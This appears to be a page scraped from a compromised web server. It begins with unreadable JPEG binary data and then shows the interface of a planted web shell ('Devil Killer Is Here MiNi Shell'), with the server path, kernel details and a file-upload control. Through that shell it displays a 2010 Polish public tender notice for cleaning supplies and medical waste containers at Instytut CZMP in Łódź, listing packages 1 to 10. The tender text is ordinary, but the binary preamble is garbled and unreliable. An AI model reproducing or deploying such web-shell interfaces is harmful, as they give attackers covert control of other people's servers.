JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100629/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100629/187650-N-2010.html

<p class="kh_header"><b>Łódź: dostawa środków i sprzętu do utrzymania czystości dla Instytutu CZMP - ZP/63/2010</b><br>
<b>Numer ogłoszenia: 187650 - 2010; data zamieszczenia: 29.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Instytut "Centrum Zdrowia Matki Polki" - Samodzielna Sekcja Organizacyjno-Prawna; Zamówienia Publiczne , ul. Rzgowska 281/289, 93-338 Łódź, woj. łódzkie, tel. 042 2711188, 2711069, faks 042 2711187.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.iczmp.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Badawczo-Rozwojowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> dostawa środków i sprzętu do utrzymania czystości dla Instytutu CZMP - ZP/63/2010.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje 28 Pakietów. Szczegółowy opis przedmiotu zamówienia zawiera załącznik I do niniejszego ogłoszenia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.83.12.00-8, 39.22.43.00-1, 33.76.00.00-5, 33.16.94.00-6, 39.51.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 28.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;"><br/>1. Dokumenty opisujące specyfikę wyrobu - dotyczy Pakietu 27:
<br/>Zgłoszenie do Krajowego Systemu Informowania o Kosmetykach
<br/>2. Dokumenty opisujące specyfikę wyrobu - dotyczy chemii gospodarczej:
<br/>Zamawiający wymaga dostarczenia kart charakterystyki w trzech przypadkach, tj. jeśli:
<br/>- substancja  lub preparat spełniają kryteria klasyfikujące je jako niebezpieczne  zgodnie z dyrektywą 67/548/EWG lub dyrektywą 1999/45/WE
<br/>- substancja jest trwała,  wykazująca zdolność do bioakumulacji i toksyczna( PBT)  lub też jest bardzo trwała i wykazuje bardzo dużą zdolność do bioakumulacji (vPvB). Kryteria identyfikacji takich substancji zawarto w załączniku XIII do rozporządzenia REACH
<br/>- substancje znajdują się na liście sporządzonej zgodnie z art.59 ust.1 rozporządzenia REACH z powodów innych niż w/wymienione, tj. substancji podlegających procedurze udzielania zezwoleń.
<br/>W pozostałych przypadkach Zamawiający wymaga od Wykonawców przekazania pisemnej informacji, zawierającej : 
<br/>- numery rejestracji dla każdej substancji, nadane przez Agencję ds. Chemikaliów, jeśli skompletowano dokumenty rejestracyjne;
<br/>- informację o tym, czy dana substancja wymaga zezwolenia; 
<br/>- informację dotyczącą każdego przypadku zastosowania ograniczenia; 
<br/>- informację odnoszącą się do bezpieczeństwa używania danej substancji/ preparatu oraz wszelkie inne dostępne i stosowne informacje dotyczące substancji, niezbędne do umożliwienia określenia i zastosowania odpowiednich środków kontroli ryzyka, tj. dotyczące niebezpiecznych właściwości , bez względu na zastosowania, których dotyczą.
<br/>3. Dokumenty opisujące specyfikę wyrobu:
<br/>Ulotka informacyjna o składzie i sposobie użytkowania preparatu - dot. Pakietu 28 pozycji 25-30 oraz proporcjach rozcieńczania preparatu przy różnych stopniach zabrudzenia powierzchni - dot. Pakietu 28 pozycji 26-30.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Zamawiający żąda wskazania przez Wykonawcę w ofercie części zamówienia, której wykonanie powierzy podwykonawcom. Wykonawca może powierzyć wykonanie zamówienia podwykonawcom, z wyjątkiem przypadku, gdy ze względu na specyfikę przedmiotu zamówienia Zamawiający zastrzeże w Specyfikacji Istotnych Warunków Zamówienia, że część lub całość zamówienia nie może być powierzona podwykonawcom. Potwierdzeniem spełnienia żądania Zamawiającego jest wypełnienie oświadczenia stanowiącego załącznik Nr 5 do SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p><br/>Na podstawie art.144 ust. 1 PZP Zamawiający przewiduje możliwość dokonania zmiany w zawartej umowie w następujących sytuacjach:
<br/>1. zmiany stawki podatku VAT
<br/>2. zmiany terminu realizacji zamówienia w przypadku niewykorzystania ilości w okresie trwania umowy;
<br/>3. zmiany sposobu konfekcjonowania a co za tym idzie liczby opakowań. W wyniku niniejszych zmian Zamawiający przewiduje możliwość zmiany ceny jednostkowej opakowania, która zostanie wyliczona z proporcji.
<br/>4. zmiany organizacyjnej Instytutu CZMP istotnej dla realizacji niniejszej umowy;
<br/>5. zmiany formy prawnej prowadzonej działalności gospodarczej ;
<br/>6. zmiany adresu siedziby firmy oraz siedziby  serwisu i zmianie adresu zamieszkania właściciela lub współwłaściciela firmy;
<br/>7. w przypadku gdy zmiana jest korzystna dla Zamawiającego</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.iczmp.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Instytut Centrum Zdrowia Matki Polki, 93-338 Łódź ul. Rzgowska 281/289, Samodzielna Sekcja Organizacyjno-Prawna - Zamówienia Publiczne, pawilon A (Ginekologiczno-Położniczy), poziom 0, pok. Nr 15.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.07.2010 godzina 12:00, miejsce: Instytut Centrum Zdrowia Matki Polki, 93-338 Łódź ul. Rzgowska 281/289, Samodzielna Sekcja Organizacyjno-Prawna - Zamówienia Publiczne, pawilon A (Ginekologiczno-Położniczy), poziom 0, pok. Nr 15.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> <br/>1. Druciak stalowy - 200 szt.
<br/>2. Ścierka ostra - 8 000 szt.
<br/>3. Gąbka do naczyń rozm. 6 x 10 cm - 2 500 szt.
<br/>4. Ściereczka uniwersalna o boku od 30 do 40 cm. /kolor wg. zamówienia niebieski, różowy, żółty/ - 12 000 szt.
<br/>5. Ścierka do podłogi wiskoza z polipropylenem - 1 000 szt.
<br/>6. Szufelki z gumką + zmiotka	 - 80 kpl.
<br/>7. Rękawice gospodarcze z naturalnego lateksu z bawełnianą wyściółką. Rozmiary od S do XL według zamówienia - 1 800 par
<br/>8. Szczotki do mycia zębów - twarde - 25 szt.
<br/>9. Maszynka jednorazowa do golenia - 8 000 szt.
<br/>10. Kosz na śmieci plastikowy 2 l. z ruchomą pokrywą /kolor wg. Zamówienia biały, żółty, czerwony, niebieski/ - 20 szt.
<br/>11. Wiadra plastikowe 10-12 litrów z pokrywą - 100 szt.
<br/>12. Zasłony do brodzika 130 cm x 200 cm - 20 szt.
<br/>13. Miska plastikowa średnica 26-30 cm. - 20 szt.
<br/>14. Miska plastikowa średnica 36 - 40 cm - 40 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.83.12.00-8, 39.22.43.00-1, 33.76.00.00-5, 33.16.94.00-6, 39.51.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> <br/>1. Pad do szorowarki czarny lub brązowy - średn. 43 cm - 30 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.83.12.00-8, 39.22.43.00-1, 33.76.00.00-5, 33.16.94.00-6, 39.51.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> <br/>1. Kosz ze stali nierdzewnej na śmieci /na pedał/ - poj. 10-12 litrów - 180 szt.
<br/>2. Stelaż ze stali nierdzewnej z plastikową kwadratową lub prostokątną pokrywą na worek duży poj. 120 litrów - na pedał, wyposażony w dwa tylne kółka. Kolor pokrywy wg. zamówienia fioletowy, czerwony, biały  - 50 szt.
<br/>3. Stelaż ze stali nierdzewnej z plastikową kwadratową lub prostokątną pokrywą na worek średni poj. 70 litrów - na pedał, wyposażony w dwa tylne kółka. Kolor pokrywy wg. zamówienia fioletowy, czerwony, biały - 65 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.83.12.00-8, 39.22.43.00-1, 33.76.00.00-5, 33.16.94.00-6, 39.51.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> <br/>1. Szczotka do WC z pojemnikiem /szczotka umieszczona w pojemniku wisząca na nim z osłoną przymocowaną do uchwytu szczotki/ - 200 szt.
<br/>2. Dozownik naścienny na mydło z pojemnikiem o pojemności 0,8-1 litr, zamykany na kluczyk, uruchamiany bez dotykania dłońmi - przycisk łokciowy. Łatwy do mycia i dezynfekcji, łatwa wymiana pompki, szybkie dozowanie, wykonany z trwałego, odpornego plastiku. Możliwość regulacji dawkowania - 0,5 ml., 1 ml., 1,5 ml. jednorazowo. Wyjmowana część dozująca. Tylna ścianka musi być płaska (nie może mieć wypukłości) tak aby umożliwiała przyklejenie i przykręcenie dozownika do podłoża - 100 szt.
<br/>3. Dozownik naścienny na płyn dezynfekcyjny z pojemnikiem o pojemności 0,8-1 litr, zamykany na kluczyk, uruchamiany bez dotykania dłońmi - przycisk łokciowy. Łatwy do mycia i dezynfekcji, łatwa wymiana pompki, szybkie dozowanie, wykonany z trwałego, odpornego plastiku, nadaje się do stosowania preparatów alkoholowych. Możliwość regulacji dawkowania - 0,5 ml., 1 ml., 1,5 ml. jednorazowo. Wyjmowana część dozująca.Tylna ścianka musi być płaska (nie może mieć wypukłości) tak aby umożliwiała przyklejenie i przykręcenie dozownika do podłoża - 100 szt.
<br/>4. Pojemnik na pojedyncze ręczniki jednorazowe w listkach składanych w ZZ, wymiar listka 25cm x 23cm / poj. na  min  400 listków. ręczn./ - 100 szt.
<br/>5. Uchwyt metalowy na papier toaletowy z pokrywą /na zwykłą rolkę/ - 150 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.83.12.00-8, 39.22.43.00-1, 33.76.00.00-5, 33.16.94.00-6, 39.51.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> <br/>1. Pojemnik medyczny jednorazowego użytku, plastikowy, pokrywa szczelnie zatrzaskiwana, brak możliwości ponownego otwarcia raz zamkniętego pojemnika. Na pojemniku widnieje etykieta zawierająca: piktogram którego wzór zamieszczony jest w załączniku nr 3 do Rozporządzenia Ministra Zdrowia z dnia 22.04.2005r., kod odpadu, miejsce pochodzenia odpadu, datę otwarcia i zamknięcia pojemnika oraz podpis osoby zamykającej pojemnik. - poj. 60 l - 68 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.83.12.00-8, 39.22.43.00-1, 33.76.00.00-5, 33.16.94.00-6, 39.51.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Ocena jakości - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet 6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Pojemnik medyczny jednorazowego użytku, plastikowy, pokrywa szczelnie zatrzaskiwana, brak możliwości ponownego otwarcia raz zamkniętego pojemnika. Na pojemniku widnieje etykieta zawierająca: piktogram którego wzór zamieszczony jest w załączniku nr 3 do Rozporządzenia Ministra Zdrowia z dnia 22.04.2005r., kod odpadu, miejsce pochodzenia odpadu,datę otwarcia i zamknięcia pojemnika oraz podpis osoby zamykającej pojemnik - poj. 30 l - 940 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.83.12.00-8, 39.22.43.00-1, 33.76.00.00-5, 33.16.94.00-6, 39.51.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Ocena jakości - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pakiet 7.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Pojemnik medyczny jednorazowego użytku, plastikowy, pokrywa szczelnie zatrzaskiwana, brak możliwości ponownego otwarcia raz zamkniętego pojemnika. Na pojemniku widnieje etykieta zawierająca: piktogram którego wzór zamieszczony jest w załączniku nr 3 do Rozporządzenia Ministra Zdrowia z dnia 22.04.2005r., kod odpadu, miejsce pochodzenia odpadu,datę otwarcia i zamknięcia pojemnika oraz podpis osoby zamykającej pojemnik- poj. 20 l - 610 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.83.12.00-8, 39.22.43.00-1, 33.76.00.00-5, 33.16.94.00-6, 39.51.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Ocena jakości - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pakiet 8.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Pojemnik medyczny jednorazowego użytku, plastikowy, pokrywa szczelnie zatrzaskiwana, brak możliwości ponownego otwarcia raz zamkniętego pojemnika. Na pojemniku widnieje etykieta zawierająca: piktogram którego wzór zamieszczony jest w załączniku nr 3 do Rozporządzenia Ministra Zdrowia z dnia 22.04.2005r., kod odpadu, miejsce pochodzenia odpadu, datę otwarcia i zamknięcia pojemnika oraz podpis osoby zamykającej pojemnik - poj. 5 l - 200 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.83.12.00-8, 39.22.43.00-1, 33.76.00.00-5, 33.16.94.00-6, 39.51.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Ocena jakości - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Pakiet 9.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Pojemnik medyczny jednorazowego użytku, plastikowy, pokrywa szczelnie zatrzaskiwana, brak możliwości ponownego otwarcia raz zamkniętego pojemnika. Na pojemniku widnieje etykieta zawierająca: piktogram którego wzór zamieszczony jest w załączniku nr 3 do Rozporządzenia Ministra Zdrowia z dnia 22.04.2005r., kod odpadu, miejsce pochodzenia odpadu, datę otwarcia i zamknięcia pojemnika oraz podpis osoby zamykającej pojemnik - poj. 2 l - 12 000 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.83.12.00-8, 39.22.43.00-1, 33.76.00.00-5, 33.16.94.00-6, 39.51.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Ocena jakości - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Pakiet 10.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Pojemnik medyczny jednorazowego użytku, plastikowy, pokrywa szczelnie zatrzaskiwana, brak możliwości ponownego otwarcia raz zamkniętego pojemnika. Na pojemniku widnieje etykieta zawierająca: piktogram którego wzór zamieszczony jest w załączniku nr 3 do Rozporządzenia Ministra Zdrowia z dnia 22.04.2005r., kod odpadu, miejsce pochodzenia odpadu,datę otwarcia i zamknięcia pojemnika oraz podpis osoby zamykającej pojemnik - poj. 1 l - 7 000 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.83.12.00-8, 39.22.43.00-1, 33.76.00.00-5, 33.16.94.00-6, 39.51.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Ocena jakości - 40</li>
</ul>
</li>
</ul><br>
